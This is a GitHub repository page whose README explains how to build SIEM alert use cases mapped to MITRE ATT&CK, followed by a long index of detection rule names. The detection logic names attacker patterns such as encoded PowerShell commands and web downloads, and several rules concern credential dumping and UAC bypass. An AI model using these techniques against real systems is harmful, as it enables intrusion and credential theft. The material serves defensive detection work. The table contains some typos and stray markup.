https://github.com/rajeevranjancom/mitre-based-usecases
This repository is established as part of my personal projects and cybersecurity research endeavors.
https://github.com/rajeevranjancom/mitre-based-usecases
Last synced: 5 months ago
JSON representation
This repository is established as part of my personal projects and cybersecurity research endeavors.
- Host: GitHub
- URL: https://github.com/rajeevranjancom/mitre-based-usecases
- Owner: rajeevranjancom
- License: mit
- Created: 2024-06-05T07:35:28.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2024-06-05T21:29:12.000Z (about 2 years ago)
- Last Synced: 2025-01-22T10:36:40.700Z (over 1 year ago)
- Size: 305 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Changelog: Change of Default File Association Detected
- License: Copying Sensitive Files with Credential Data
Awesome Lists containing this project
README
# Mitre-Based-Usecases
This repository is established as part of my personal projects and cybersecurity research endeavors.
# Working of use-cases:
Alerts in cybersecurity serve as notifications or warnings about potential security incidents or vulnerabilities within a network or system. They play a critical role in helping security teams quickly identify, investigate, and respond to threats, thus maintaining the integrity, confidentiality, and availability of information.
### Use Cases of Alerts in Cybersecurity:
1. **Intrusion Detection:**
- **Use Case:** Alerts notify security teams of unauthorized access attempts or suspicious activities.
- **Example:** An alert triggers when an unknown IP address attempts multiple failed logins on a server.
2. **Malware Detection:**
- **Use Case:** Alerts indicate the presence of malicious software such as viruses, ransomware, or spyware.
- **Example:** An alert is generated when a file matching the signature of known malware is downloaded or executed.
3. **Phishing Attacks:**
- **Use Case:** Alerts inform users and administrators about potential phishing emails or websites.
- **Example:** An alert is sent when an email with suspicious links or attachments is detected.
4. **Data Exfiltration:**
- **Use Case:** Alerts detect unusual data transfer activities that may indicate data theft.
- **Example:** An alert occurs when a large amount of sensitive data is transferred outside the network during off-hours.
5. **Vulnerability Management:**
- **Use Case:** Alerts notify about newly discovered vulnerabilities and necessary patches.
- **Example:** An alert is issued when a critical security patch is available for a widely-used software application.
6. **Configuration Changes:**
- **Use Case:** Alerts detect unauthorized or unexpected changes in system configurations.
- **Example:** An alert triggers when firewall rules are altered without proper authorization.
7. **Behavioral Anomalies:**
- **Use Case:** Alerts identify deviations from normal user or system behavior that could indicate a compromise.
- **Example:** An alert is generated when a user accesses resources they typically do not access.
8. **Compliance Monitoring:**
- **Use Case:** Alerts help ensure that systems comply with regulatory and policy requirements.
- **Example:** An alert notifies when a system configuration deviates from compliance standards like GDPR or HIPAA.
### Working of Alerts in Cybersecurity:
1. **Data Collection:**
- **Sources:** Security Information and Event Management (SIEM) systems, Intrusion Detection Systems (IDS), firewalls, antivirus software, and other security tools collect data from various network components and endpoints.
- **Logs and Events:** These systems gather logs, events, and network traffic data.
2. **Analysis:**
- **Correlation:** The collected data is analyzed and correlated to identify patterns or signatures associated with known threats.
- **Behavioral Analysis:** Machine learning and AI algorithms are used to detect anomalies and unusual behaviors that deviate from the baseline.
3. **Detection:**
- **Rule-based Detection:** Predefined rules and signatures trigger alerts when certain conditions are met (e.g., multiple failed login attempts).
- **Anomaly Detection:** Advanced systems use statistical models and machine learning to identify deviations from normal behavior, which can indicate new or unknown threats.
4. **Alert Generation:**
- **Severity Levels:** Alerts are categorized based on severity (e.g., informational, warning, critical) to prioritize response.
- **Notification:** Alerts are sent to security teams via dashboards, emails, SMS, or integration with other incident response tools.
5. **Response:**
- **Investigation:** Security analysts investigate the alerts to determine the validity and scope of the potential threat.
- **Mitigation:** If a threat is confirmed, appropriate actions are taken to mitigate the risk, such as isolating affected systems, applying patches, or blocking malicious IP addresses.
- **Reporting:** Incidents are documented, and reports are generated for compliance and further analysis.
6. **Feedback and Improvement:**
- **Tuning:** Based on the investigation outcomes, rules and detection mechanisms are refined to reduce false positives and improve detection accuracy.
- **Learning:** Continuous learning from past incidents helps in enhancing the overall security posture and readiness against future threats.
By using alerts effectively, organizations can proactively manage and mitigate risks, ensuring a robust defense against cyber threats.
Creating use case alerts based on the MITRE ATT&CK framework involves defining and implementing specific alerts that map to tactics, techniques, and procedures (TTPs) identified in the MITRE ATT&CK matrix. These use cases help in detecting potential threats by recognizing behaviors and activities associated with known adversarial tactics. Here's a step-by-step guide to creating MITRE-based use case alerts:
## MITRE MAPPING
## Step 1: Understand the MITRE ATT&CK Framework
The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by adversaries. It is divided into:
Tactics: The "why" of an attack (e.g., Initial Access, Execution, Persistence).
Techniques: The "how" of an attack (e.g., Phishing, PowerShell, Scheduled Task).
## Step 2: Identify Relevant TTPs
Based on your organization's threat model and environment, identify which TTPs are most relevant. For example, if your organization uses Windows, you might focus on techniques frequently used against Windows systems.
## Step 3: Gather Logs and Data Sources
Ensure that you have access to necessary logs and data sources such as:
Endpoint detection and response (EDR) logs
Network traffic logs
Authentication logs
Application logs
## Step 4: Define Use Cases
Translate the identified TTPs into specific use cases. Each use case should describe the following:
Objective: What you aim to detect.
Tactic and Technique: Corresponding MITRE ATT&CK tactic and technique.
Data Sources: Logs and data required.
Detection Logic: How to identify the suspicious activity.
## Step 5: Implement Detection Logic
Create the actual detection rules using your SIEM or EDR tool. The detection logic can vary based on the platform, but generally involves:
Indicators of Compromise (IoCs): Specific artifacts like file hashes or IP addresses.
Behavioral Indicators: Patterns of behavior such as unusual login times, execution of certain scripts, etc.
## Step 6: Test and Tune
Before deploying the use cases into production, test them thoroughly to ensure they work as expected and do not generate false positives. Fine-tune the logic as necessary.
## Step 7: Deploy and Monitor
Deploy the alerts in your production environment and continuously monitor their effectiveness. Update the use cases as new TTPs emerge or as your environment changes.
Example Use Case: Detecting PowerShell Execution (T1059.001)
Objective: Detect malicious PowerShell execution.
Tactic: Execution
Technique: PowerShell (T1059.001)
Data Sources:
Windows Event Logs (Event ID 4104 for PowerShell Script Block Logging)
EDR logs
## Detection Logic:
Look for suspicious PowerShell commands that are commonly used by attackers, such as those that:
Encode scripts (powershell.exe -EncodedCommand)
Download content from the internet (e.g., Invoke-WebRequest, wget)
Access WMI objects
Example Use Case: Detecting Unusual RDP Activity (T1076)
Objective: Detect unusual Remote Desktop Protocol (RDP) activity that might indicate lateral movement or unauthorized access.
Tactic: Lateral Movement
Technique: Remote Desktop Protocol (T1076)
Data Sources:
Windows Security Event Logs (Event ID 4624 for logon events)
Network traffic logs
RDP session logs
Detection Logic:
Identify RDP sessions initiated from unusual IP addresses.
Detect multiple RDP login attempts from a single IP in a short time frame.
Alert on RDP logins outside of normal business hours.
Example SIEM Rule:
# Index
| Rule Name | Associated Project |
|-----------------------------------------------|----------------------------|
| AADInternals PowerShell Cmdlet Execution | AADInternals PowerShell Cmdlet Execution |
| AD Object WriteDAC Access Detected | AD Object WriteDAC Access Detected |
| AD Privileged Users or Groups Reconnaissance Detected | AD Privileged Users or Groups Reconnaissance Detected|
| Accessibility Features-Registry | Accessibility Features-Registry|
| Accessibility features - Process | Accessibility features - Process |
| Account Discovery Detected | Account Discovery Detected|
| Active Directory DLLs Loaded By Office Applications | Active Directory DLLs Loaded By Office Applications|
| Active Directory Replication User Backdoor | Active Directory Replication User Backdoor|
| Active Directory Schema Change Detected | Active Directory Schema Change Detected|
| Activity Related to NTDS Domain Hash Retrieval | Activity Related to NTDS Domain Hash Retrieval|
| Addition of SID History to Active Directory Object | Addition of SID History to Active Directory Object|
| Adobe Flash Use-After-Free Vulnerability Detected | Adobe Flash Use-After-Free Vulnerability Detected|
|Adwind RAT JRAT Detected | Adwind RAT JRAT Detected |
| Antivirus Exploitation Framework Detection | Antivirus Exploitation Framework Detection|
| Antivirus Password Dumper Detected | Antivirus Password Dumper Detected|
| Antivirus Web Shell Detected | Antivirus Web Shell Detected|
| Apache Struts 2 Remote Code Execution Detected | Apache Struts 2 Remote Code Execution Detected|
| AppCert DLLs Detected | AppCert DLLs Detected|
| Application Shimming - File Access Detected | Application Shimming - File Access Detected|
| Application Whitelisting Bypass via Bginfo Detected | Application Whitelisting Bypass via Bginfo Detected|
| Application Whitelisting Bypass via DLL Loaded by odbcconf Detected | Application Whitelisting Bypass via DLL Loaded by odbcconf Detected |
| Application Whitelisting Bypass via Dnx Detected | Application Whitelisting Bypass via Dnx Detected|
| Application Whitelisting Bypass via Dxcap Detected | Application Whitelisting Bypass via Dxcap Detected|
| Audio Capture Detected | Audio Capture Detected |
| Authentication Package Detected | Authentication Package Detected|
| Autorun Keys Modification Detected | Autorun Keys Modification Detected|
| BITS Jobs - Network Detected | BITS Jobs - Network Detected|
| BITS Jobs - Process Detected | BITS Jobs - Process Detected|
| Batch Scripting Detected| Batch Scripting Detected|
| SIEM Implementation and Log Analysis | Detection Lab|
| Bloodhound and Sharphound Hack Tool Detected | Bloodhound and Sharphound Hack Tool Detected|
| BlueMashroom DLL Load Detected | BlueMashroom DLL Load Detected|
| Browser Bookmark Discovery | Browser Bookmark Discovery|
|Bypass UAC via CMSTP Detected | Bypass UAC via CMSTP Detected|
| Bypass User Account Control using Registry | Bypass User Account Control using Registry |
| C-Sharp Code Compilation Using Ilasm Detected | C-Sharp Code Compilation Using Ilasm Detected|
| CACTUSTORCH Remote Thread Creation Detected | CACTUSTORCH Remote Thread Creation Detected|
| CEO Fraud - Possible Fraudulent Email Behavior | CEO Fraud - Possible Fraudulent Email Behavior|
| CMSTP Detected | CMSTP Detected |
| CMSTP Execution Detected | CMSTP Execution Detected|
| CMSTP UAC Bypass via COM Object Access | CMSTP UAC Bypass via COM Object Access|
| CVE-2019-0708 RDP RCE Vulnerability Detected | CVE-2019-0708 RDP RCE Vulnerability Detected|
| Capture a Network Trace with netsh | Capture a Network Trace with netsh|
| Certutil Encode Detected | Certutil Encode Detected|
| Chafer Activity Detected | Chafer Activity Detected|
| Change of Default File Association Detected | Change of Default File Association Detected|
| Citrix ADC VPN Directory Traversal Detected | Citrix ADC VPN Directory Traversal Detected|
| Clearing of PowerShell Logs Detected | Clearing of PowerShell Logs Detected/a>|
| Clipboard Data Access Detected | Clipboard Data Access Detected|
| Clop Ransomware Emails Sent to Attacker | Clop Ransomware Emails Sent to Attacker |
| Incident Response Planning and Execution | Incident Response Planning and Execution |
| Clop Ransomware Infected Host Detected | Clop Ransomware Infected Host Detected|
| Scripting and Automation for Threat Mitigation | Scripting and Automation for Threat Mitigation|
| Cmdkey Cached Credentials Recon Detected | Cmdkey Cached Credentials Recon Detected|
| CobaltStrike Process Injection Detected | CobaltStrike Process Injection Detected|
| Command Obfuscation in Command Prompt| Command Obfuscation in Command Prompt|
| Command Obfuscation via Character Insertion | Command Obfuscation via Character Insertion|
| Command Obfuscation via Environment Variable Concatenation Reassembly | Command Obfuscation via Environment Variable Concatenation Reassembly|
| Compiled HTML File Detected | Compiled HTML File Detected|
| Component Object Model Hijacking Detected | Component Object Model Hijacking Detected|
| Connection to Hidden Cobra Source | Connection to Hidden Cobra Source|
| Console History Discovery Detected | Console History Discovery Detected|
| Control Panel Items - Process Detected | Control Panel Items - Process Detected|
| Control Panel Items - Registry Detected | Control Panel Items - Registry Detected|
| Control Panel Items Detected | Control Panel Items Detected|
| Copy from Admin Share Detected | Copy from Admin Share Detected|
| Copying Sensitive Files with Credential Data | Copying Sensitive Files with Credential Data |
| Copyright Violation Email | Copyright Violation Email|
| CrackMapExecWin Detected | CrackMapExecWin Detected|
| CreateMiniDump Hacktool Detected | CreateMiniDump Hacktool Detected|
| CreateRemoteThread API and LoadLibrary | CreateRemoteThread API and LoadLibrary|
| Credential Access via Input Prompt Detected | Credential Access via Input Prompt Detected |
| Credential Dump Tools Dropped Files Detected | Credential Dump Tools Dropped Files Detected |
| Credential Dumping - Process Access | Credential Dumping - Process Access |
| Credential Dumping - Process Creation | Credential Dumping - Process Creation |
| Credential Dumping - Registry Save | Credential Dumping - Registry Save |
| Credential Dumping with ImageLoad Detected | Credential Dumping with ImageLoad Detected |
| Credentials Access in Files Detected | Credentials Access in Files Detected |
| Credentials Capture via Rpcping Detected | Credentials Capture via Rpcping Detected|
| Credentials in Registry Detected | Credentials in Registry Detected/a>|
| Curl Start Combination Detected | Curl Start Combination Detected|
| DCSync detected | DCSync detected|\
| DLL Side Loading Via Microsoft Defender | DLL Side Loading Via Microsoft Defender|
| Data Compression Detected in Windows | Data Compression Detected in Windows|
| DenyAllWAF SQL Injection Attack | DenyAllWAF SQL Injection Attack|
| Execution of Trojanized 3CX Application | Execution of Trojanized 3CX Application|
| Javascript conversion to executable Detected | Javascript conversion to executable Detected|
| LSASS Process Access by Mimikatz | LSASS Process Access by Mimikatz|
| Malicious use of Scriptrunner Detected| Malicious use of Scriptrunner Detected|
| Microsoft SharePoint Remote Code Execution Detected | Microsoft SharePoint Remote Code Execution Detected|
| Mitre - Initial Access - Valid Account - Unauthorized IP Access | Mitre - Initial Access - Valid Account - Unauthorized IP Access|
| Msbuild Spawned by Unusual Parent Process | Msbuild Spawned by Unusual Parent Process|
| Process Dump via Resource Leak Diagnostic Tool| Process Dump via Resource Leak Diagnostic Tool|
| Proxy Execution via Desktop Setting Control Panel | Proxy Execution via Desktop Setting Control Panel|
| Regsvr32 Anomalous Activity Detected | Regsvr32 Anomalous Activity Detected|
| Remote File Execution via MSIEXEC | Remote File Execution via MSIEXEC|
| ScreenSaver Registry Key Set Detected | ScreenSaver Registry Key Set Detected|
| Suspicious ConfigSecurityPolicy Execution Detected | Suspicious ConfigSecurityPolicy Execution Detected|
| Suspicious DLL execution via Register-Cimprovider | Suspicious DLL execution via Register-Cimprovider|
| Suspicious Driver Loaded | Suspicious Driver Loaded|
| Suspicious Execution of Gpscript Detected| Suspicious Execution of Gpscript Detected|
| Suspicious File Execution via MSHTA | Suspicious File Execution via MSHTA|
| SSuspicious Files Designated as System Files Detected | Suspicious Files Designated as System Files Detected|
| Suspicious Microsoft Equation Editor Child Process | Suspicious Microsoft Equation Editor Child Process|
| Suspicious Named Pipe Connection to Azure AD Connect Database | Suspicious Named Pipe Connection to Azure AD Connect Database|
| Suspicious Scheduled Task Creation via Masqueraded XML File | Suspicious Scheduled Task Creation via Masqueraded XML File|
| Suspicious WMIC XSL Script Execution | Suspicious WMIC XSL Script Execution|
| Suspicious process related to Rundll32 Detected | Suspicious process related to Rundll32 Detected|
| SUAC Bypass Attempt via Windows Directory Masquerading| DUAC Bypass Attempt via Windows Directory Masquerading|
| UAC Bypass via Sdclt Detected | UAC Bypass via Sdclt Detected |
| Unsigned Image Loaded Into LSASS Process | Unsigned Image Loaded Into LSASS Process|
| Usage of Sysinternals Tools Detected | Usage of Sysinternals Tools Detected|
| Usage of Sysinternals Tools Detected| Usage of Sysinternals Tools Detected|
| Windows Command Line Execution with Suspicious URL and AppData Strings| Windows Command Line Execution with Suspicious URL and AppData Strings|
| Windows CryptoAPI Spoofing Vulnerability Detected | Windows CryptoAPI Spoofing Vulnerability Detected|
| Windows Error Process Masquerading| Windows Error Process Masquerading|
| Xwizard DLL Side Loading Detected| Xwizard DLL Side Loading Detected|
| ZIP File Creation or Extraction via Printer Migration CLI Tool | ZIP File Creation or Extraction via Printer Migration CLI Tool|
| Data Staging Process Detected in Windows | Data Staging Process Detected in Windows|